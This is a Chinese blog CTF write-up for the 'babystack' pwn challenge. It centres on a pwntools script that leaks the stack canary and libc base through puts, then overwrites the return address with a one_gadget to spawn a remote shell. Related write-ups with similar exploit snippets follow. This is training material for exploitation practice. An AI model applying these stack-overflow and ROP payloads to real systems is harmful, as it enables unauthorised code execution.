Babystack

最新推荐文章于 2025-05-19 09:09:41 发布
原创 最新推荐文章于 2025-05-19 09:09:41 发布 · 557 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了一种针对babystack的远程缓冲区溢出攻击方法,通过精心构造payload,利用puts函数泄露canary值和libc基址,最终实现getshell。文章展示了如何使用ROP链泄露函数地址,并通过one_gadget技巧获取shell。 
#!/usr/bin/env python
context.log_level = 'debug'
from pwn import *
elf=ELF('./babystack')
libc=ELF('./libc-2.23.so')
p=remote('111.198.29.45',30865)
prdi_addr=0x400a93
main_addr=0x400908
one_gadget=0x45216//找到库中('bin/sh')的相对地址
put_plt=elf.plt['puts']
put_got=elf.got['puts']
p.sendlineafter('>> ','1')
p.sendline('a'*0x88)
p.sendlineafter('>> ','2')
p.recvuntil('a'*0x88+'\n')
canary=u64(p.recv(7).rjust(8,'\x00'))//利用puts函数泄露出canary,之前read时读入0x88个a和1个/n,占用canary的/x00
print hex(canary)
p.sendlineafter('>> ','1')
payload='a'*0x88+p64(canary)+'a'*8+p64(prdi_addr)+p64(put_got)+p64(put_plt)+p64(main_addr)
//rop链泄露put函数地址
p.sendline(payload)
p.recv()
p.sendlineafter('>> ','3')
put_addr=u64(p.recv(8).ljust(8,'\x00'))
print hex(put_addr)
libc_base=put_addr-libc.symbols['puts']
getshell=libc_base+one_gadget
p.sendlineafter('>> ','1')
payload1='a'*0x88+p64(canary)+'a'*8+p64(getshell)
p.sendline(payload1)
p.sendlineafter('>> ','3')
p.interactive()

补充一下one_gadget的用法

XCTF pwn1 babystack
zwb2603096342的博客
05-22 968
攻防世界 pwn1 babystack canary的泄露和onegadget的泄露
bjdctf_2020_babystack
zip471642048的博客
06-22 905
checksec 一下 64位程序 没开啥东西 ,ida看一下程序 咋一看read函数读入0个字符串,读了个寂寞,scanf也不能溢出,好像没有问题 但是scanf会读入一个用户输入的数赋值给nbytes ,然后read会读取nbytes大小的字符,也就是说我们可以任意溢出长度 运行这个函数直接拿到shell exp ret 是为了平衡栈 其实往backdoor函数后递+1也行...
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 1155
[buuctf]bjdctf_2020_babystack
go pwn 2017 SECCON - Baby Stack
yongbaoii的博客
04-09 1482
要用ida7.6来恢复一些它的符号表 不然还得用像go_parser的一些工具。
bjdctf2020 babystack
pondzhang的专栏
05-08 424
from pwn import * p = process('./bjdctf_2020_babystack') p.recvuntil("length of your name:\n") p.sendline('1024') p.recvuntil("What's u name?\n") payload = 'a'*12 + p32(1024) + 'a'*8 + p64(0x000000000...
buuctf-bjdctf_2020_babystack(pwn)
2301_81574836的博客
02-18 1029
buuctf-bjdctf_2020_babystack(pwn)题解
BJDCTF 2020 babystack2.0
2301_79793667的博客
12-11 798
因为第二次所需要读取的数值的字节数大于10,第一次输入的值在第二次作为无符号整型,所以我们需要输入一个负数来同时满足第一次输入和第二次输入,可以输入-1。通过分析,我们发现第一次输入的值不能大于10,否则会退出程序,第一次输入的值将作为第二次通过read函数输入的buf的值的最大字节数。让我们输入数据,随便输入了几个数据,就被退出程序了,那我们检查一下附件,然后用ida打开。通过read函数栈溢出到后门函数的地址0x400726。那我们就用64位ida打开。首先打开环境,并下载附件。找到了后门函数的地址。
[BJDCTF 2020]babystack2.0 CTF-PWN
m0_72904009的博客
05-13 552
[BJDCTF 2020]babystack2.0 CTF-PWN
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 449
BUUCTF 做题练习
ctf.show BJDCTF2020——babystack
2401_88087539的博客
01-12 420
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1646
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
NSSCTF [BJDCTF 2020]babystack
最新发布
2401_88087539的博客
05-19 419
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
pwnabletw-babystack
qq_41667316的博客
12-25 1830
BabyStack 思路 危险函数,strcpy。 在copy的时候strcpy看似没有问题,但是由于src的内容并没有清空,还保存着被销毁栈的原有数据,而strcpy是根据"\x00"来判定的,所以造成了栈溢出。 login的限制可以用"\x00"绕过。 首先通过login函数中的strcmp,把canary值爆破出来。 然后利用copy函数栈上的垃圾数据中保存的一些libc的相关地址,将其拷贝到canary的地址,然后继续爆破,就可以得到libc的机制。 给了libc,一发one_gadget。 e
(攻防世界)(pwn)pwn1(厦门邀请赛)babystack
PLpa的博客
07-21 2947
canary!canary!canary! 拿到题目,下载附件,查看保护。 可以很清楚的看到,程序开了canary,这就说明我们不能实现暴力的栈溢出,还要考虑这个canary的值。 我们首先运行一下程序: 可以很清楚的看出程序的功能,当我们选择1时,我们就可以输入,当我们选择2时,我们可以输出我们前面输入的东西。 进入IDA看源代码: 我们可以看到canary的值存放在v6里,v6距离rbp...
bjdctf_2020_babystack2【BUUCTF】
qq_41696518的博客
08-31 935
bjdctf_2020_babystack2【BUUCTF】
buuctf actf_2019_babystack
weixin_45441024的博客
12-07 628
buuctf actf_2019_babystack from pwn import * from LibcSearcher import LibcSearcher r = remote("node3.buuoj.cn",27848) elf = ELF("/home/pwn/Desktop/ACTF_2019_babystack") nbytes_length = 0xE0 offset = 0xD0 leave_retn = 0x00400A4E puts_got = elf.got["puts"]
pwnable tw BabyStack writeup
charlie_heng的专栏
03-02 1672
这题做得好难受….. 首先漏洞很明显是strcpy那里,可以strcpy超过0x3f个字符串 然后login,以\x00开头的话,就可以过login了 一开始我是想先泄漏程序的其中一个地址,然后利用stackOverflow 来rop一波的,然后发现,strcpy只能复制到\x00前,所以只能用one_gadget 来一发get shell 但是这里还有canary要过,这里很明显就是利用...
others_babystack
z1r0的博客
12-23 373
others_babystack 查看保护 输入功能存在溢出,有canary所以需要泄露canary。有溢出,还有puts。输入时会发现canary这个地方可以被输出。 可以泄露出canary了。而它的下一行是start_main,刚好也可以被泄露。有了libc和canary,返回地址填充one_gadget即可。最后为什么要退出?那肯定是结束while才可以ret。 from pwn import * context(arch='amd64', os='linux', log_level='deb
buuctfbjdctf_2020_babystack2 1
03-19
### 关于 BUUCTF BJDCTF_2020 Babystack2 的解题思路 BABYSTACK2 是一道典型的 ROP(Return-Oriented Programming)题目,主要考察选手对栈溢出漏洞的理解以及如何利用返回地址控制程序执行流程的能力。以下是该题目的分析与解决方法: #### 题目背景 BJDCTF_2020 中的 Babystack2 提供了一个二进制文件和对应的环境配置[^1]。目标是通过堆栈缓冲区溢出来实现任意代码执行。 #### 工具准备 为了完成此挑战,需要以下工具: - **GDB (GNU Debugger)**:用于调试二进制文件并观察内存状态。 - **pwntools**:Python 库,简化了 exploit 开发过程中的许多操作。 - **ROPgadget**:帮助查找可用的小工具(gadgets)以构建所需的指令序列。 #### 技术要点解析 ##### 1. 漏洞发现 通过对提供的 binary 进行逆向工程可以确认存在一处未受保护的 strcpy() 函数调用,这允许攻击者覆盖函数返回地址从而劫持 CPU 控制流。 ##### 2. 基础设施设置 由于现代操作系统默认启用了多种安全机制如 NX bit 和 ASLR ,因此成功实施 ROP 攻击还需要考虑这些因素的影响 。具体来说, - 如果开启了 Address Space Layout Randomization(ASLR),则需找到一种方式泄露基址; - Non-executable stack 则意味着我们不能直接注入 shellcode 而应依赖已有代码片段形成有效载荷。 ##### 3. 构建 Payload 基于上述条件设计 payload 主要分为以下几个部分: - 找到合适的 gadgets 组合来规避 DEP/NX protection 并最终触发 system("/bin/sh") 或类似的命令执行动作 ; - 当前场景下可能涉及到 chain multiple gadgets together 形成完整的功能单元; 下面给出一段简单的 python script 使用 pwntools 来生成这样的输入数据包: ```python from pwn import * context.arch = 'amd64' elf = ELF('./babystack2') rop = ROP(elf) offset = cyclic_find('kaie') # replace with actual offset value found via testing/cyclic pattern generation payload = fit({ offset: rop.chain() }) p = process('./babystack2') p.sendline(payload) p.interactive() ``` 注意以上仅为框架示意, 实际应用时还需填充具体的 gadget 地址等细节信息. #### 总结 综上所述,Babystack2是一道综合性较强的CTF赛题,它不仅测试参赛人员对于基础原理掌握程度同时也锻炼其实际动手解决问题能力.
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值